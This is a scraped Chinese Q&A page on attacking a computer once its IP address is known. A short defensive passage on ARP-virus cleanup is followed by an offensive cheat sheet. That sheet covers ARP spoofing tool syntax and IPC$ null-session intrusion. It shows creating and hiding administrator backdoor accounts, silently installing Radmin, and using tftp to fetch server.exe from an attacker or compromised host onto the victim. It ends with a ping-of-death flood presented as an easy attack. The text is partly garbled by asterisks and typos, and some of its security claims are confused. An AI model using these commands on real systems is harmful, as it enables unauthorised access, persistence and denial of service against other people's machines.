知道ip地址怎么攻击_知道了网站IP怎么攻击

hacker|
188

请问外网IP攻击是怎么回事,是怎么实现的?

现在局域网中感染ARP病毒的情况比较多,清理和防范都比较困难,给不少的 *** 管理员造成了很多的困扰.下面就是个人在处理这个问题的一些经验,同时也在网上翻阅了不少的参考资料. ARP病毒的症状 有时候无法正常上网,有时候有好了,包括访问网上邻居也是如此,拷贝文件无法完成,出现错误;局域网内的ARP包爆增,使用ARP查询的时候会发现不正常的MAC地址,或者是错误的MAC地址对应,还有就是一个MAC地址对应多个IP的情况也会有出现。 ARP攻击的原理 ARP欺骗攻击的包一般有以下两个特点,满足之一可视为攻击包报警:之一以太网数据 包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者,ARP数据包的发送和目标地址不在自己 *** 网卡MAC数据库内,或者与自己 *** MAC数据 库MAC/IP不匹配。这些统统之一时间报警,查这些数据包(以太网数据包)的源地址(也有可能伪造),就大致知道那台机器在发起攻击了。现在有 *** 管理 工具比如 *** 执法官、P2P终结者也会使用同样的方式来伪装成网关,欺骗客户端对网关的访问,也就是会获取发到网关的流量,从而实现 *** 流量管理和 *** 监 控等功能,同时也会对 *** 管理带来潜在的危害,就是可以很容易的获取用户的密码等相关信息。 处理办法通用的处理流程 1.先保证 *** 正常运行 *** 一:编辑一个***.bat文件内容如下: arp.exe s**.**.**.**(网关ip) ************(网关MAC地址)end 让 *** 用户点击就可以了! 办法二:编辑一个注册表问题,键值如下: Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"MAC"="arp s网关IP地址网关MAC地址" 然后保存成Reg文件以后在每个客户端上点击导入注册表。 2.找到感染ARP病毒的机器 a、在电脑上ping一下网关的IP地址,然后使用ARP -a的命令看得到的网关对应的MAC地址是否与实际情况相符,如不符,可去查找与该MAC地址对应的电脑。 b、使用抓包工具,分析所得到的ARP数据报。有些ARP病毒是会把通往网关的路径 指向自己,有些是发出虚假ARP回应包来混淆 *** 通信。之一种处理比较容易,第二种处理比较困难,如果杀毒软件不能正确识别病毒的话,往往需要手工查找感 染病毒的电脑和手工处理病毒,比较困难。 c、使用MAC地址扫描工具,Nbtscan扫描全网段IP地址和MAC地址对应表,有助于判断感染ARP病毒对应MAC地址和IP地址。 预防措施1、及时升级客户端的操作系统和应用程式补丁; 2、安装和更新杀毒软件。 3、如果 *** 规模较少,尽量使用手动指定IP设置,而不是使用DHCP来分配IP地址。 (不过这个实在不是好主意)

怎么去简单的攻击一个网吧的IP

1、先确定你要攻击公网IP(去网吧访问获取公网ip的网站即可获取)还是私网IP(去网吧执行ipconfig即可获取)。

2、公网IP一般是通过防火墙或者类似软件作了NAT,转换成网吧内网(私网)IP段的。

互联网~~~~网吧公网IP~~~网吧防火墙NAT~~~网吧内网IP段

3、如果你想在网吧内攻击旁边的电脑,就通过内网IP搞吧

4、如果你想在互联网攻击网吧公网IP,相当于攻击防火墙的外网IP,相当于攻击那台防火墙,努力吧。。。。。。。。或者期待网吧为了省钱根本没设置防火墙

5、在互联网攻击网吧内网IP,用 *** 远程或者装个木马吧。

6、在网吧内攻击网吧内其它同网的电脑,这个就不用说了吧。

1,ddos攻击个人电脑是通过电脑 *** ip进行攻击吗?2,知道电脑 *** ip地址可以发送病毒木马吗?

一,ddos很少会攻击个人电脑

1、首先要知道是ddos攻击是什么意思,DDoS攻击通过大量合法的请求占用大量 *** 资源,以达到瘫痪 *** 的目的。

2、个人电脑一般不会收到ddos攻击,因为个人电脑的ip一般是动态的,只要重新登陆就会更换ip,进行ddos攻击的意义不大。

3、ddos攻击要使用大量的 *** 资源,而且一般都是要付费使用的,当然很多高级黑客可以使用肉鸡进行攻击,但一般来说成本比较大,所以一般不会有人会攻击个人电脑,除非有深仇大恨。

二、知道ip地址可以用DDOS攻击,不可以发送病毒木马,马上病毒木马需要对方有系统漏洞和主动点击运行链接,程序等,需要激活才能运行病毒木马,现在只要有杀软和清理软件都会禁止病毒木马的自动运行,需要用户手动操作,所以不要点击来历不明的链接和应用软件。

当然泄露了IP地址的话,你的电脑就会出现很多问题。具体说几点: 1。别人可借助你的IP地址,让 *** 断线。 2。IP地址泄露, *** 安全就会让别人控制,这样会泄露自己的很多文件, 3,具体建议是你更好换一个IP地址,这样你的电脑就会安全很多了,现在网上的病毒,木马很多,每次读哦注意杀毒,就会安全了。

若知道了一个人的IP地址,怎样攻击他?

1. 一般欺骗。

CheatARP DstIP DstMAC SourceIP SourceMAC

DstIP:你要攻击的主机。

DstMAC:被攻击主机的MAC(如果为FFFFFFFFFFFF,那么就是一个广播地址)广播就是同网段上的所有计算机都能收到。

SourceIP:你要伪造的IP。

SourceMAC:你要伪造的MAC地址。

如:

CheatARP 192.168.85.1 FFFFFFFFFFFF 192.168.85.129 005056E9D042

192.168.85.1 高速缓存会被更新成 192.168.85.129 005056E9D042

br

2. IP冲突。

DstIP,DstMAC都和上诉一样。

SourceIP:(注意)为你要攻击的主机IP,不能象上面一样随便写了。

SourceMAC: 随便一个12位的字符传,如AAAAAAAAAAAA 只要不要和DstMAC相同就可以了

这里下载

知道黑客的IP,如何反击他

通过DOS反向连接,然后计算机管理:command MMC

结束进程:NET SHARE

查看版本:ver

查看中端(服务):net start

查看文件:dir

加用户:c:\winnt\system32net user adminserver$ admin /add

提权限:net localgroup administrators adminserver$ /add

211.38.172.2 2180

查看用户net user

远程连接到主机CMD命令:telnet 主机IP

踢人:logoff ID

查看当前人:query user

打开telnet:net start telnet

telnet连接工具:OpenTelnet

删除共享: net share c$=c:\

删除共享: net share c$ /del

启用GUEST:net user guest /active:yes

为GUEST设密码:net user guest 888888

提升到管理员:net localgroup "Administrators" guest /add

超级用户隐藏器:c:\door adminserver$:admin

克隆帐号:ca \\IP 你建立的帐号 密码 肉机默认帐号 密码

ca \\127.0.0.1 adminserver$ admin adminserver admin

完全禁止系统模认工享

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------

中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

c:\winnt\system32\copy termsrv.exe service.exe

c:\winnt\system32\cd..

c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向:f:\web\ "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:

net use \\对方IP\ipc$ "" /user:"administrator"

(在上传文件的目录下)远程复制文件:

c:\radminnet use \\a-01\ipc$ "12345" /user:administrator

c:\ramdincopy r_server.exe \\a-01\admin$\system32

c:\ramdincopy radmin.reg \\a-01\admin$\sytem32

在对方CMD下:

c:\winnt\system32\regedit /s radmin.reg

c:\winnt\system32\r_server.exe /install /silenec

net start r_server

copy r_server.exe \\对方IP\admin$\system32

c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90

copy 文件名 \\IP\admin$\system32

进入对方CMD:

c:\opentelnet.exe \\Ip administrator "" 0 90

登陆CMD:

c:\telnet IP 90

安装RADMIN:

c:\winnt\system32\

r_server /install silence

c:\winnt\system32\

r-server

导入注册表:

c:\winnt\system32\regedit.exe /s aaa.reg

看端口:

c:\winnt\system32\

netstat -an

改端口:

c:\winnt\system32\

r_server.exe /port:1024 /pass:1234 /save /silence

起动服务:

c:\winnt\system32\net start r_server

隐藏文件:

c:\winnt\system32\attrib.exe +h r_server.exe +h

%systemroot$\system32

看看共享开了没有,没有的话把共享开开

c:\winnt\system32net share

清单是空的。

c:\winnt\system32net share ipc$

命令成功完成。

c:\winnt\system32net share admin$

命令成功完成。

注册表运行命令

regedit

查看端口:netstat-n

SA传送文件TFTP

先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

℃冰河℃ 2007-01-02 19:50

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名  开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地 *** 配置情况

它是用来检查 *** 是否通畅或者 *** 连接速度的命令。作为一个生活在 *** 上的管理员或者黑客来说,ping命令是之一个必须掌握的DOS命令,它所利用的原理是这样的: *** 上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标

主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在

DOS窗口中键入:ping /? 回车,出现如图1所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了。

-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标

P是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 够 *** 他了。不要用于其他目的哦!!!!!

0条大神的评论

发表评论